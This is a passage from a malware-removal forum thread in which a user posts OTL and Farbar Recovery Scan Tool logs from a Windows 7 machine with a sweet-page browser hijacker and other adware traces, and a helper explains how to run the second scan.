[2014/10/14 06:55:03 | 000,024,048 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/10/14 06:52:07 | 002,955,376 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/10/14 06:52:07 | 001,287,800 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/10/14 06:52:07 | 000,006,206 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/10/14 06:47:12 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/10/14 06:47:06 | 3056,103,424 | -HS- | M] () -- C:\hiberfil.sys
[2014/10/08 16:29:24 | 000,002,350 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/10/02 17:52:02 | 000,002,547 | ---- | M] () -- C:\Users\Mitey Fresh\Desktop\`Staff Computer - Shortcut.lnk
[2014/10/01 14:52:11 | 000,002,501 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2014/10/01 14:52:11 | 000,001,659 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
[2014/09/30 17:12:05 | 000,076,441 | ---- | M] () -- C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
[2014/09/30 17:07:06 | 000,001,354 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\iSkysoft Video Converter Ultimate.lnk
[2014/09/29 21:19:55 | 433,221,317 | ---- | M] () -- C:\Windows\MEMORY.DMP
[2014/09/26 13:08:59 | 000,000,004 | ---- | M] () -- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
[2014/09/19 12:43:03 | 000,013,824 | ---- | M] () -- C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
 
========== Files Created - No Company Name ==========
 
[2014/09/30 17:07:06 | 000,001,354 | ---- | C] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\iSkysoft Video Converter Ultimate.lnk
[2014/09/30 17:06:57 | 000,721,263 | ---- | C] () -- C:\Windows\SysWow64\ISCM64.dll
[2014/09/30 17:06:57 | 000,214,528 | ---- | C] () -- C:\Windows\SysWow64\ISCM32.dll
[2014/09/29 19:47:17 | 000,076,441 | ---- | C] () -- C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
[2014/09/17 09:37:48 | 000,000,004 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
[2014/07/10 17:27:56 | 000,004,096 | -H-- | C] () -- C:\Users\Mitey Fresh\AppData\Local\keyfile3.drm
[2014/03/11 16:33:22 | 000,002,149 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Local\recently-used.xbel
[2014/02/03 08:33:54 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2013/12/19 09:49:37 | 000,000,027 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Roaming\WB.CFG
[2013/08/08 12:48:44 | 000,007,061 | ---- | C] () -- C:\Program Files\Common Files\ecisettings.props.preupdate
[2013/08/08 12:37:38 | 000,002,539 | ---- | C] () -- C:\Program Files\Common Files\ECI_Data.bat
[2013/08/08 12:37:38 | 000,000,329 | ---- | C] () -- C:\Program Files\Common Files\AppMgrIcon.gif
[2013/08/08 12:37:38 | 000,000,128 | ---- | C] () -- C:\Program Files\Common Files\StartClient.bat
[2013/05/28 17:24:28 | 000,013,824 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/05/09 12:25:17 | 000,061,304 | ---- | C] () -- C:\Users\Mitey Fresh\g2mdlhlpx.exe
[2013/04/05 11:10:11 | 000,764,746 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/03/28 13:45:05 | 000,000,376 | ---- | C] () -- C:\Windows\ODBC.INI
 
========== ZeroAccess Check ==========
 
[2009/07/14 15:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/25 13:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/25 12:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 12:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 23:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 12:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/10/10 11:45:41 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\AUSkey
[2013/07/28 21:46:44 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\AutoBinaryCode2
[2014/09/12 21:15:52 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\BatteryCare
[2014/04/08 21:58:58 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\BitComet
[2014/06/26 20:50:56 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\calibre
[2013/11/18 21:12:47 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Com.Comm100.LiveChat.AirVisitorMonitor.En
[2013/11/18 21:12:46 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Com.Comm100.LiveChat.AirVisitorMonitor.En.ED02F0ED4016DF29F52CC2E3BD1ED89CCC440D32.1
[2014/01/23 10:00:34 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\DAEMON Tools Lite
[2013/03/28 16:55:05 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Monotype Imaging
[2014/10/01 14:43:05 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\PerformerSoft
[2014/02/09 21:43:00 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\rmi
[2014/10/03 21:35:27 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Spotify
[2014/10/01 14:54:32 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\SupTab
[2014/10/02 13:43:04 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
[2014/09/30 17:07:43 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 40 bytes -> C:\ProgramData\MTA San Andreas All:NT
@Alternate Data Stream - 40 bytes -> C:\ProgramData:NT
@Alternate Data Stream - 160 bytes -> C:\ProgramData\MTA San Andreas All:NT2
@Alternate Data Stream - 160 bytes -> C:\ProgramData:NT2
@Alternate Data Stream - 131 bytes -> C:\ProgramData\TEMP:373E1720
 
< End of report >
 

 

 

 

 


#2
awesomesauce

    Member

  • Topic Starter
  • Member
  • 21 posts

I should add that this problem is with Chrome.



#3
Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

Hi there,

 

I appreciate the OTL log; however, you have some peculiarities in your OTL scan that make me want to see your machine scanned by a different tool as well. Would you please perform the following scan and post the resulting two files?

 

Scan with Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.


  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click Run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to the disclaimer.
  • Make sure that the Addition option is checked.
  • Press the Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please copy and paste their content into your next reply.

 



#4
awesomesauce

    Member

  • Topic Starter
  • Member
  • 21 posts

Hi,

 

Thank you for your response.

 

The link to Farbar Recovery Tool gave the response that it wouldn't work on my OS, so I found FRST64 on this website instead: http://filepony.de/d...ror-server.html

 

Here is the FRST.txt logfile:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 14-10-2014
Ran by Mitey Fresh (administrator) on KIRRA-PC on 15-10-2014 15:39:42
Running from C:\Users\Mitey Fresh\Downloads
Loaded Profile: Mitey Fresh (Available profiles: Mitey Fresh)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Nico Mak Computing) C:\Program Files\File Association Helper\FAHWindow.exe
(Spotify Ltd) C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(LogMeIn Inc.) D:\Games\LogMeIn Hamachi\hamachi-2.exe
(LogMeIn, Inc.) D:\Games\LogMeIn Hamachi\LMIGuardianSvc.exe
(LogMeIn Inc.) D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
(LogMeIn, Inc.) D:\Games\LogMeIn Hamachi\LMIGuardianSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\OUTLOOK.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\EXCEL.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [FAHConsole] => C:\Program Files\File Association Helper\FAHConsole.exe [729272 2014-01-28] (Nico Mak Computing)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\Run: [Spotify Web Helper] => C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1514040 2014-10-03] (Spotify Ltd)
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {496991f1-83b7-11e3-a045-406186b70622} - H:\autorun.exe
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {6140cd31-99d4-11e3-ac34-406186b70622} - F:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-2275511576-419542734-2349628481-1000\...\MountPoints2: {efd7f59c-3f87-11e4-aca2-406186b70622} - F:\Startme.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2013-03-27] (Microsoft Corporation)
AppInit_DLLs: C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL => C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL File Not Found
AppInit_DLLs-x32: c:\progra~3\fastan~1\fastan~1.dll => "c:\progra~3\fastan~1\fastan~1.dll" File Not Found
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-AU
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ninemsn.com.au/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x6E8195E10142CE01
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe http://www.sweet-pag...F1A80P6304P6304
SearchScopes: HKLM - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
SearchScopes: HKLM - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
SearchScopes: HKLM-x32 - DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
SearchScopes: HKLM-x32 - {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.sweet-pag...q={searchTerms}
BHO: No Name -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.x64.dll No File
BHO: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.x64.dll No File
BHO-x32: UTubErAdBllockEr -> {25880CCB-24B8-785F-89B4-3DDCE851F8CF} -> C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.dll No File
BHO-x32: RooboSaver -> {65716D5D-F3D7-C35B-7F16-25F69BF58395} -> C:\ProgramData\RooboSaver\9BLj9uIzS.dll No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: iSkysoft Video Converter Ultimate 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\ProgramData\iSkysoft\Video Converter Ultimate\WSBrowserAppMgr.dll (Wondershare)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler-x32: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
Filter: text/xml - {807553E5-5146-11D5-A672-00B0D022E945} -  No File
 
FireFox:
========
FF ProfilePath: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default
FF NewTab: hxxp://www.sweet-page.com/newtab/?type=nt&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
FF DefaultSearchEngine: sweet-page
FF SelectedSearchEngine: sweet-page
FF Homepage: hxxp://www.sweet-page.com/?type=hp&ts=1412135528&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @java.com/JavaPlugin,version=10.17.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @abr.gov.au/KeyMgmtPlugin -> C:\Program Files (x86)\ABR\Plug-In\bin\npAUSkeyPlugin.dll (Commonwealth Government of Australia)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\sweet-page.xml
FF Extension: Fast Start - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\[email protected] [2014-10-01]
FF Extension: UTubErAdBllockEr - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\[email protected] [2014-02-19]
FF Extension: RooboSaver - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\[email protected] [2014-03-24]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]
FF Extension: iSkysoft Video Converter Ultimate - C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected] [2014-09-30]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]l.com] - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
FF Extension: No Name - C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]c2592d0df.com [Not Found]
FF StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe http://www.sweet-pag...F1A80P6304P6304
 
Chrome: 
=======
CHR Profile: C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (SEOquake) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc [2014-03-24]
CHR Extension: (Google Docs) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-25]
CHR Extension: (Google Drive) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-25]
CHR Extension: (YouTube) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-25]
CHR Extension: (Google Search) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-25]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2014-04-21]
CHR Extension: (Google Wallet) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR Extension: (Gmail) - C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-25]
CHR StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://www.sweet-pag...F1A80P6304P6304
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BITCOMET_HELPER_SERVICE; C:\Program Files (x86)\BitComet\tools\BitCometService.exe [1296728 2013-11-29] (www.BitComet.com)
R2 Hamachi2Svc; D:\Games\LogMeIn Hamachi\hamachi-2.exe [2525008 2014-09-04] (LogMeIn Inc.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
S2 671c50b0; "C:\Windows\system32\rundll32.exe" "c:\progra~3\browse~1\BrowserSystemEnahncerSvc.dll",service
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2014-01-23] (Disc Soft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-15 15:39 - 2014-10-15 15:41 - 00017171 _____ () C:\Users\Mitey Fresh\Downloads\FRST.txt
2014-10-15 15:39 - 2014-10-15 15:39 - 00000000 ____D () C:\FRST
2014-10-15 15:38 - 2014-10-15 15:38 - 02110464 _____ (Farbar) C:\Users\Mitey Fresh\Downloads\FRST64.exe
2014-10-15 15:36 - 2014-10-15 15:37 - 01101824 _____ (Farbar) C:\Users\Mitey Fresh\Downloads\FRST.exe
2014-10-14 21:36 - 2014-10-14 21:36 - 00000052 _____ () C:\Users\Mitey Fresh\Desktop\geoguesser.txt
2014-10-14 16:46 - 2014-10-14 16:46 - 00215754 _____ () C:\Users\Mitey Fresh\Desktop\OTL.Txt
2014-10-12 22:27 - 2014-10-15 08:56 - 00000347 _____ () C:\Users\Mitey Fresh\Desktop\cruise holiday.txt
2014-10-10 13:08 - 2014-10-10 15:14 - 00062372 _____ () C:\Users\Mitey Fresh\Downloads\Extras.Txt
2014-10-10 13:07 - 2014-10-14 16:34 - 00215754 _____ () C:\Users\Mitey Fresh\Downloads\OTL.Txt
2014-10-10 12:57 - 2014-10-10 12:58 - 00602112 _____ (OldTimer Tools) C:\Users\Mitey Fresh\Downloads\OTL.exe
2014-10-01 14:54 - 2014-10-01 14:54 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\SupTab
2014-10-01 14:52 - 2014-10-02 13:43 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
2014-10-01 14:51 - 2014-10-01 14:54 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\WinZip
2014-10-01 14:51 - 2014-10-01 14:54 - 00000000 ____D () C:\ProgramData\WinZip
2014-10-01 14:51 - 2014-10-01 14:51 - 00002293 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2014-10-01 14:51 - 2014-10-01 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2014-10-01 14:50 - 2014-10-01 14:51 - 00000000 ____D () C:\Program Files\WinZip
2014-10-01 14:49 - 2014-10-01 14:49 - 00873680 _____ ( ) C:\Users\Mitey Fresh\Downloads\winzip18-home (2).exe
2014-10-01 14:06 - 2014-10-01 14:07 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012 (2).exe
